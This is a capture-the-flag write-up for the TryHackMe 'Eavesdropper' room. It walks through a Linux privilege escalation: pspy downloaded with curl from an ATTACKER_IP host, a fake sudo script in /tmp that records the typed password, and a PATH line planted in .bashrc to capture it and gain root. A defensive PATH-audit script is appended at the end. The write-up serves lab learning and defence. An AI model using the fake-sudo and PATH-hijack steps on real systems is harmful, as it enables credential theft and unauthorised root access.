🕵️ Eavesdropper - CTF Write-Up - TryHackMe
Listen closely and you might hear a password!

Room Link : https://tryhackme.com/room/eavesdropper
Enumeration
As the room's title suggests, our objective is to eavesdrop in order to obtain a password. I've explored various common enumeration methods within this room, testing different ways to exploit it; while some approaches showed promise, most did not yield the desired results.
To keep this write-up concise, let's dive right in. Our first step is to check the running processes.
```bash
ps aux
```
The output will look something like this:
```
frank@workstation:~$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  1.0  1.4  12172  7220 ?        Ss   16:48   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root          69  2.2  1.8  13580  8948 ?        Ss   16:49   0:00 sshd: frank [priv]
frank        105  0.0  1.0  13904  5228 ?        S    16:49   0:00 sshd: frank@pts/0
frank        107  0.1  0.8   5992  3860 pts/0    Ss   16:49   0:00 -bash
frank        115  0.0  0.6   7644  3280 pts/0    R+   16:49   0:00 ps aux
```
Looking at this list, it becomes evident that there is another SSH process running with elevated privileges (sshd: frank [priv], owned by root). To monitor what that process does without being noticed, we will use the pspy tool. Follow these steps:
Download pspy from its releases page: https://github.com/DominicBreuker/pspy/releases
Once downloaded, deploy the tool on the target for further investigation.
```bash
# On the attacker machine: start a web server in the directory holding the pspy binary
python -m http.server 8080

# On the target: change to /tmp
cd /tmp
# Fetch pspy64 from the attacker machine
curl http://ATTACKER_IP:8080/pspy64 -o pspy
# Make it executable and run it
chmod +x pspy
./pspy
```
While monitoring the processes pspy reports, focus on those with UID=0, since those run as root. Among them, the following command stands out:
```bash
sudo cat /etc/shadow
```
To obtain the password, we must hijack this process. The key observation is that sudo is called by its bare name rather than an absolute path, so the shell resolves it by searching the directories in PATH.
Here's the concept:
By placing a directory we control at the front of PATH and creating our own sudo command in it, we can intercept the call. Let's proceed with the steps.
Change to the /tmp directory and create a file called sudo with the following contents:
```bash
#!/bin/bash
# Fake sudo: show a prompt like the real one and record whatever is typed
read -r -p "Password : " pass
echo "$pass" > /tmp/password
```
Now make it executable:
```bash
chmod +x /tmp/sudo
```
Exploitation
Finally, change the PATH variable in the .bashrc file in /home/frank. One thing to note: this must be the first line of the .bashrc file.
```bash
PATH=/tmp:$PATH
```
Log out of the current SSH session.
Log back in; the password should now have been captured in /tmp/password.
Once logged in, comment out the PATH line in the .bashrc file.
Log out again.
Log back in to obtain a root shell.
```bash
# Type the following command to get root
sudo -i
```
Provide the password, and you will have the root shell.
```bash
# Get the flag
cat /root/flag.txt
```
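For the defender's side of this room, here is an added POSIX shell check (not part of the original write-up) that audits a PATH value for the two conditions the hijack above relies on, a writable directory ahead of the system directories and a command such as sudo resolving somewhere unexpected, and flags PATH assignments in an rc file like the one planted in .bashrc. The canonical location /usr/bin/sudo and the temporary demo directory are assumptions.

```sh
# Audit a PATH value for the two conditions the hijack above relies on:
#  1. a writable (or world-writable, like /tmp) directory listed ahead of the
#     system directories, where a fake "sudo" can be planted;
#  2. a command such as "sudo" resolving somewhere other than its expected path.
# Prints one RISK line per finding; returns 0 when clean, 1 otherwise.
audit_path() {
  _rest="$1:"                      # trailing ':' so the last entry is consumed
  _cmd="${2:-sudo}"                # command whose resolution we check
  _expected="${3:-/usr/bin/sudo}"  # assumed canonical location of that command
  _rc=0; _found=""; _uid="$(id -u)"
  while [ -n "$_rest" ]; do
    _dir="${_rest%%:*}"; _rest="${_rest#*:}"
    case "$_dir" in
      ""|.|..|./*|../*)
        echo "RISK: relative PATH entry '${_dir:-<empty>}' resolves to the current directory"
        _rc=1; continue ;;
    esac
    [ -d "$_dir" ] || continue
    # world-writable (-H follows a symlinked /bin), or writable by this non-root user
    if [ -n "$(find -H "$_dir" -prune -perm -0002 2>/dev/null)" ] ||
       { [ "$_uid" -ne 0 ] && [ -w "$_dir" ]; }; then
      echo "RISK: writable directory '$_dir' in PATH; a fake '$_cmd' can be planted there"
      _rc=1
    fi
    # remember the first executable named $_cmd: that is what the shell would run
    if [ -z "$_found" ] && [ -f "$_dir/$_cmd" ] && [ -x "$_dir/$_cmd" ]; then
      _found="$_dir/$_cmd"
    fi
  done
  if [ -n "$_found" ] && [ "$_found" != "$_expected" ] && ! [ "$_found" -ef "$_expected" ]; then
    echo "RISK: '$_cmd' resolves to '$_found', not '$_expected'"
    _rc=1
  fi
  return "$_rc"
}
# Report PATH assignments in a shell rc file (the foothold above is a
# "PATH=/tmp:$PATH" line at the top of ~/.bashrc). Returns 1 if any are found.
rc_path_lines() {
  grep -n 'PATH=' "$1" 2>/dev/null && return 1
  return 0
}
# Demo on constructed data only: a /tmp-like directory holding a fake "sudo".
demo() {
  _d="$(mktemp -d)"; chmod 1777 "$_d"
  printf '#!/bin/sh\nexit 0\n' > "$_d/sudo"; chmod +x "$_d/sudo"
  printf 'PATH=%s:$PATH\n' "$_d" > "$_d/bashrc"
  audit_path "$_d:/usr/bin:/bin" || echo "audit_path returned $?"
  rc_path_lines "$_d/bashrc" || echo "rc_path_lines returned $?"
  rm -rf "$_d"
}
```

Call `demo` to see both findings on the constructed data, or run `audit_path "$PATH"` and `rc_path_lines ~/.bashrc` as the user whose session you are checking.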

I hope you had fun, learning new stuff ☺️ ❤️